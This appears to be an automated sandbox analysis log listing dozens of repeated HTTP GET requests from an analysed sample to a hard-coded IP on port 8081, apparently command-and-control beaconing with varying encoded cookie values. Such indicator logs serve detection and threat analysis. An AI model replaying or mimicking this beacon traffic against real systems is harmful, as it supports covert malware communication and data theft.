          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=B47OKYp5cTmTShmWLZXpVtHOOHBKfCMK-KAtrl2OzfeoLTVmC0XjdlrPYw4K5aNNeMtLHSgQaxlK5EozsUImtteFyGVordlbmKfu0M_-eCixY06Cde_7h7zAx2fL8As-ciCWUDAY90MSvj9e_jiLvXzAjzvmjAbBs_EFhDJBcTVlI6gGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=iU1Z0iwkLXwueNPTY8NOG94K7_B-ELZNCa-QYKyuVmb6p9-jGdqpSctyNFEWMBsepNFkOFfrytaMyDg49IhQsZPkpVW9jWd8NVOfUww2l4SjhbzGvcB_KIF32RsWCBUjfBJ9xclBr3gXizrUftIoejj8Bfg0U60kGfmiPlZehmPnEBAyUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qOm_jCQRvVw_w-xLEh2PZPMlEHIAFXZbM9gQbc83_0NIaSJYVLoLxGdDfmoIIoqJ0EVXIo49CPV0nb9TZ47C5Kd-mk7MvCE2g1vIYsjf3MpYI0dWPMKkvtpQzlD7U_1oWNZmwMEzqLGPAMkQhyRQM1l5jIkw8ICeRZ7A6wx4ymGupsHAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=58MJJWo0tjVzB96azdguWjGD_3yqMeQGGO3qor3DCvtIYPJq6wgkerqCpALqqGRBmIaMEchdrBWqqY0_UQ_hujfID2mI4B5XeOop3C-zvyRRLomOlaI8i1yNAGsrvcwykm1RXNBVME_y8_hSHnVMsZyNSDcGwcHNU7zCiNIMtjmFbm8KUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NOIpFJGLXbqT16MV3mw-3WOlnzbDv8aLtADgphEBJqBHCK9lpHXZj3bdRJern2vYGX4U_upEuhAxZ0j-SScgdy5L1ZMAIhe6iPzvlbGZ50IeKswAAG8P7jzYqd2rp2Xlwb0NA3Tu376qJEoSw31YvIVTdT6J_N3ipFbS-Ovx9qVav2D0User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8dZTfX0uUa1m_AC6SyJjlaoa_INZKpqqauf8nJYIE7IRVs6pDYXnNT58kptRHWZ4iXq709cC5AQtolOiPrEuFf5Bdr-Vg83H2mQkk5HgMDsBHKunZf1IT4NvIqGibBGZAemKMZgMREDWPyXh3hu8wgBGYHhpz2xvHKEsGlVHJpD3mS0xUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=EdI9V5wlgkeFFuroO8kaKMeSyw5cINB07vze0EvSPom-ccYYHRkQCEyTkHAcuVAzbpe4Yz5MmGdcuLlNpx7VyMHZOxt-8Soljvsdrtmii1anP738Y7MI-aqcNBndrPhAZHxlLiZEBD0E4swg6GR4w2qcfEXw0PW_pa32-iQdgktzf1t4User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VCBqBNjYaNTDCjnD7tRa7A_sxfr83KPTzxHF5TP-Ksu0oPfQqHPeTJuKq-L0618BLIyCqnL03X2IVGrbm0cXbFu3T8YwdfS-f5Id6jQWCUKk6pLewAtxNiaZG9gHmijgpB-zSD36fTlzyRyYe-2Fu6WwWQHMOVUWuVcVY_CxH-lSbxRIUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qYGqnwzo3jEOtCCeQw-9Vv7GHL1e3EUAKWNjLYxipSvaayzuORZaBOu-xxw2_OhThB2XdXcnOZusBMt11ESj_LMoVhidQZQxFZ9sHiz6ZMmDSU-LnQyMZaG7KlY2xOZuXN6OiOmNXDU3R8mZXh7bNxgw9rUUn15pOTVRc3aSdS7H3ON_User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=z3wjoEKLnLBbuPQf5WcE3xk81fmCjs6DMFLAJ5V8IH5g39jvw7cO_5I9jofCF07EsDmmlODihpCCFqe6ebDLPx93JeygXzTSUFUDWQcMlaF5kaMLvR0WDnQyKu4DAua3utJ72fjqGsraTNLXNspmNLQyYrIufutIewPoDfqznLyt0UWPUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=pRHTCAB4p6YCJFkJT5_EwfJWZSpSTDyXJfMauoDy3LzW-1V5NYYjk-cuvos6bJHEiI3u4nu3QAyglLLi2NTaa7-4L4-R0e2mGQ8ViSBqHV6P2TYckZz18q0rU8E6VJ_5UE73H-UdJaI717AOUo6ioBSgjyIYDyf-NaUo5HoCDLnLTJroUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=s2BnkT-YZUEkSjRWCZRXeeisyG8bnK5GKFHIcNS-J15T4PpFTzPT2XzKpncTq1KUy8yPP5W00OhvFGdOfAca-bz3QlPXNfkrmNIQf9NWBNdDqp9LJ0t8o8HZFk3g2iV1Q1--3dq6cKyUiRENnK2ILkLwVJQreViDXhcY9hfxEny1LxndUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=YPUU7u0Cq_70McNRSu4zkba14rctB_nNn9v3aTr1FzDPVu-hbD45sT20ucltnnmKH7CR2k9rsd4tn5D01jn8cbD-EqIP1gOc_9w0F6iFou_WGJRFEpQhQNu7HaCsi9H5FVtMl1djLYR1xeWZmUNRehu7VfyB99wG1IrfQ1U6q_ICWHLBUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=G3ex6b4exUe8Qjvo8fmmIEwwB8vsKl52m5V4Wz6Uvl1onTeYi-BBcllI3GqECvMlNuuMA8XRIu0e8tADZrK4igHeTW4vt49Hp2l3aJ4Mf78xv1T9L_qXExNNMSCEMv0Y7iiV_lt7R0OFsdLv7OjAQarG7cOmaUUfi8NKBcRkblh1KvgJUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rpXGOiJtxOo5v5X9FGH20vVZacQGaQ_tNaRp28lLhvVOFVvuUsZycmE_B9wOXvM_1jkulIhBcUNy4cblYfK7UqEC4_jKwFiAhSex1M6jpXxeXz7gOr7dCNwst-b9L4TeXqofdsdP0QeJfLCmgVgphV8F9T82jPkoQ-K5XQoEs9eo2rh2User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n7DjpjrZlwg4hWmndT70b8j3VYRo7Qw5H1IqFLpT7BLsWmXXDycTPd2PjiUAzaFqsizeTEEWcKKaNYJM4nXqxYUZHyGrcN0II64lJxrLLfC1eAayqz3FXJeKY28A9a9Xau_Hsd-8FQwBdoCgaC-SDi4Bv4wirhdQDwQYSkCjPBfx7apGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ykuj-0e8HOtej3RE4FCEhBwLVaKHuU7YNWVAfJBLoCVl6Fi0xoCOpJcKDtzHIM6ftQ4mz-XVBsuHISfhfIdLZBpApbelaLSJVWKDAgI7Ffp8piNQuCqWVXEFqrUGNWbsv-X7gv3dmpHfe1KMM_3mb7EF4ukrSWsTfjRoVv-EHOeo5sXUUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zTRrtkHMaWZaHjhxd8BbXpb4xEhlyKJhVgXEV6rqK3kttPZiMWff_gKeqlBt_16ztZiDGOvg3M8RQGtpAlMW3sKjTnSpYfUM5oYcWK0CCPA9_pNsWR9whL-NGmqejilSPQuy-qTufIvq3R0q4vmECTykWLNVLVSkIEMU0WmlHlvLexX6User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=3KDMj3nJuCF7lUaONi7bRovneq0r_SMQXEIFPflDwzuvSkr-TDc8FJ6foQxD3Y5D8TzxZQIGX4vZJa1loWXF7MYJMAjoYPIhYL4KDlnbAtn2aCmb6C3qddSaTEZD5YB-Kf_omJysOiVCZq-JKz-9J20RkKVhvjh5TBQ3YwOzEz6y_YVvUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ButdX4sc4k-SL4rgLPB6INCrqwZLGbB8-cW-2FzrXoGpSKYQCiBwAFuq8HgLgDA7ea7Yayl1-G9LgdlFsCe1wNbgWxNpyEotmcJ9ps6b616wBt30dIpo8b2lVBHKlZhIc0UFJjF9ZDUT26wo_10Yy32lHE3n6ZW3spSW8jMk4kNkRjtwUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=XnpmP9KCZO_JUDX45I5W1wW2ycH2hq_oxUvJ3jmkJvC--vvroinSd5HQp9n-sVM6JtaOkXiu0UaCDmbgkR0bV1HtQ_06L_iFdcgR0T5MBXmusJ7lylF9DSzDF-MNwCTbrkW_czegcQJ5kxCjcbeJgK_qVTrGY1ktsw0ZWPrrE9JYNRhzUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-j9zHHfIzAxu-6Sj0CRUYyx_hUW3zZ4_BRGQm6A_cMJVnIhT9vReQ6d-3jv3VB54hXr2KNWh1iy3VfcGTPObgyo0dVCVHGRuZRZT5TJPxR1M0vO3iF5GskFxelI2QbYLj5ErZc2pSnbvD4JrA4k2iIFxMg4bPbv0TkC4sc_wzACYkhUzUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=unjm4h8RkkwdTWzjUPbxK-0_UMBNJQl9OpovUJ-b6VbJkmCTKu8WefhHi2ElBaQul-TbCGTedea__YcIx73vgaDRGmWOuNhMBmYgYz8DKLSQsAP2jvXAGLJCZislPaoTTyfC9fp0EEgkvoXkTeeXSgvJusgHZhIUKswdDmVrOVPUJa8CUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-s7y9nY28CZt5KExQDrCHqECXQhSMjshYf9dF50QsjkaTm8iBp1GvjVkMxBaBcfzgmIaWNwaRY8muvIpNamPnvVZ1zSem2xM0XyFGJr4kbAKBAosbuXpxIh3gyqpdLASCvErupMU5cvdJ4Rq1QMdSQtewfNi183kF7mNkV5fhxv8gYy6User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=k_1myR4K2dkHObF2ueZBtkW9kJDeD4vqbNOFTsn9ZRc8Xp2GnzZLls68y-6elgut7Ljj_bxjw_nel-LTJTGOVkP2YIX83nG7DNRGMFuN0MglEOZi4ZxTZyizb4dfg6Pe5lM-sKRrX6OGzZe-aksjXeizJ9ty_64hJ4KtZKYy2dXxUADmUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8_dwoFaeBA5UwvqhGXlnaaSwxoIEqp8_cxW5EtYUfxSAHfbRY2CAO7HIHSNsijJs3mtNSi1R46T2chFKjjJ5w-lejCfHN04OT-m2IXaMvvbZP5W0x3pWWvvN8GlssjxRBqhUt7P7hgptMROmBGgBCEJGLIpO6YRWY0OLTCzkrxGdqjlAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=mMjIihQwyloP4ptNIjz4YsMEZ3QwNAFdA_lna_8WiEV4SFVeZJt8wldiCWw4A_2P4GQgJL4cf_NEvMhVV6-14pdf7Uj8nVYws3q_ZPj-q8xoAjBQDOPTuOpxuVbLcopuaPcRxvES37e_Ib4WtwUnNWlY-48A0feYdb-37TxZvWeeh7bGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aOtv7-Uc0P_8L7hQQvBIkL6rmbYlGYLMl8WMaDLrbDHHSJSgZCBCsDWqwshlgAKLF67q20d1yt8lgev13ieHcLjgaaMHyHid98JPFqCb2e7eBu9EGopaQdOlZqGklar4HUU3ll99VoV9256YkV0qexOlLv2J6acH3JSkQl0k0PMKRgnAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=9iHDV1NIt_lRFElWHK_UnqFmdXUBfCzIdsMK5dPCzOOFy0UmZrYzzLQertRpXIGb273-vSiHUFPzpKK9i-TKNOyIP9DC4f35Sj8F1nNaDQHc6SZDwqzlrf4bQ55pZI-mA37nQLYtNf1o56BRAb6y_0eQn31LPzehZpU4uykyHOaYfIq3User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n1yu4hKrEfILmHldtUeJnUkcWLvSrkPBYHJNZcVcrTww_1Wtk5eDvcIdA8WSN8OG4Bkr1rDCC9LSNir4KZBGfU9XqK7wf7mQAHWOG1csGOMpsS5J7T2bTCQSp6xTImv16vL2m6jKl4iKbF-VZurrduQS7_B-XmYKKyNlT6qTEf798cjNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=g0eC4A-_gDAUbdEnObOyCNiLLR4ru0s3GHYtAeSZwi9jxx80fxQ2qEztQwYjjLfl--tqTqWTNZlfM4I_TCD_iIzQpyLnEhxaqPX1DuNx4aZzjXo6F2yZ0vH-8zzQ_cAEc3hbrOqdld2krvR8rIptX3LXseUbXr3ybjD9hyfW9w2FCPysUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=oIPDnwXqtzEHtkmeSg3UVvfEdb1X3iwAIGEKLYVgzCvTaUXuMBQzBOK8rhw__oFTjR_-dX4lUJulBqJ13UbK_LoqPxiUQ_0xHJ0FHiX4DcmKSyaLlA7lZai5Q1Y_xo9uVdzniOCPNTU-RaCZVxyyNxEyn7UdnTdpMDc4c3-QHC7O3op_User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NO4zVLkZjESgKuTrHvUUK-KuxQ15HN53y8DQ027uMIqbTcgbOCUeC2mvnnM5hV4wS6u2YBtwlmR5hLdOgiLby-TlNRhbzSQmq8cTrfyehVWCA7P_Ro8G-o-gOhr4kPZDQUBrLQN4Cj4h3sIjzVh2wE-gckbV7Pu8gJH4-QEhjEhWQ1V7User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=92pnD3uSZd9gQDTITZ5X56ymyPFflq7YbFvI7pC0J8AX6vrbCznTRzjApulXoVIKj8aPodG-0HYrHmfQOA0aZ_j9Qs2TP_m13NgQ4ZdcBEkHoJ_VY0F8PYXTFtOk0CXrB1W-Q56wcDLQgxGT2KeIsAb6VApvc1gdGh0YaFP7EuLxJRlDUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wUIBGWQrdbdmd4sYK8wW0JYFtzs2H-6GQaDIq-ShDq2yqIdoUdXxgoN9bJpeP0PV7N488x_kkh3Ex2DzvIcIetvr_Z71gj-3fVzHmEQ5z0_riuQN9c8n48l4gdBeB03oNB0lDoFO97NfhGIfNt1wsXDzXTN8XPXvUfb69R5R3qivH0j5User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=2KzkdVVbW2VMaDPK8rfDCg7sEiyVXglWJ4IH8oKs56t3Dx861GfJKoXtSVLVx4kRp-lhQfcyQUWVxmBvbmAM6gin4jm3j_MHR4XEjBDcUnRuQWTeqs3R22Pi7TsU0iFirQK8DO863R_NnBUCIRqh4aPipWc5riydbNMv2O1jW2m6AYJaUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
